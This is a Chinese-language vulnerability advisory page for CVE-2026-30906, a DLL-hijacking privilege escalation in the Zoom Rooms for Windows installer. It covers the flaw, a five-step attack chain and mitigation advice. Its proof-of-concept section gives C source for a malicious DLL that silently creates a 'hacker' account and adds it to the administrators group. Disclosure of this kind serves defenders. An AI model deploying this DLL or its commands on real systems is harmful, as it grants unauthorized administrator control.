IPBUF安全漏洞报告
English
CVE-2026-30906 CVSS 7.8 高危

CVE-2026-30906 Zoom Rooms Windows安装程序本地提权漏洞

披露日期: 2026-05-13

漏洞信息

漏洞编号
CVE-2026-30906
漏洞类型
不受信任的搜索路径
CVSS评分
7.8 高危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Zoom Rooms for Windows

相关标签

本地提权DLL劫持不受信任的搜索路径ZoomWindows

漏洞概述

Zoom Rooms for Windows 7.0.0 之前版本的安装程序中存在不受信任的搜索路径漏洞。该漏洞是由于程序在加载必要的库文件时,未对当前工作目录或系统路径进行严格的安全验证。经过身份认证的本地攻击者可以利用此漏洞,通过在特定路径下放置恶意的DLL文件,诱骗安装程序加载并执行恶意代码,从而导致权限提升,完全控制受影响系统。

技术细节

该漏洞属于典型的DLL劫持或不受信任的搜索路径漏洞。在Windows系统中,应用程序加载动态链接库(DLL)时,通常会按照特定的顺序搜索文件,首先是应用程序当前目录,然后是系统目录等。Zoom Rooms安装程序在运行时,未能正确限制搜索路径,导致优先加载了当前目录下的恶意DLL而非系统目录下的正版DLL。攻击者首先需要拥有目标系统的低权限用户访问权限。通过触发安装程序或在特定的路径环境下运行安装程序,攻击者可以将精心制作的恶意DLL文件放置在安装程序优先搜索的目录中。当安装程序尝试加载该库时,恶意代码即被执行。由于安装过程往往需要较高的权限(如SYSTEM或管理员权限),攻击者通过此方式可以绕过UAC限制,从低权限用户提升至SYSTEM权限,从而实现对系统的完全控制,包括修改系统配置、安装后门或窃取敏感数据。

攻击链分析

STEP 1
步骤1:获取本地访问权限
攻击者需要有目标机器的本地低权限账户访问权限(PR:L)。
STEP 2
步骤2:识别漏洞点
确认Zoom Rooms安装程序版本低于7.0.0,并分析其加载DLL时的搜索路径顺序。
STEP 3
步骤3:植入恶意文件
攻击者将编译好的恶意DLL文件放置在安装程序会优先搜索的不受信任路径(如当前工作目录)中。
STEP 4
步骤4:触发安装程序
诱导管理员或自动调度运行Zoom Rooms安装程序,或利用其他方式触发安装流程。
STEP 5
步骤5:权限提升
安装程序加载恶意DLL,以高权限(通常是SYSTEM)执行恶意代码,完成提权。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
/* * PoC for CVE-2026-30906 - Untrusted Search Path * This is a malicious DLL source code (e.g., fake_msvcr120.dll) * Compile as a DLL and place it in the untrusted path. */ #include <windows.h> #include <stdlib.h> BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: // Code to execute when the DLL is loaded by the installer // Example: Add a new user or start a reverse shell WinExec("cmd.exe /c net user hacker P@ssw0rd /add", SW_HIDE); WinExec("cmd.exe /c net localgroup administrators hacker /add", SW_HIDE); MessageBox(NULL, L"Exploit Executed!", L"CVE-2026-30906", MB_OK); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }

影响范围

Zoom Rooms for Windows < 7.0.0

防御指南

临时缓解措施
建议用户立即将Zoom Rooms for Windows更新至最新版本。在无法立即更新的情况下,应限制普通用户对系统关键目录的写入权限,并谨慎运行安装程序,避免在不可信的路径环境下执行安装操作。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表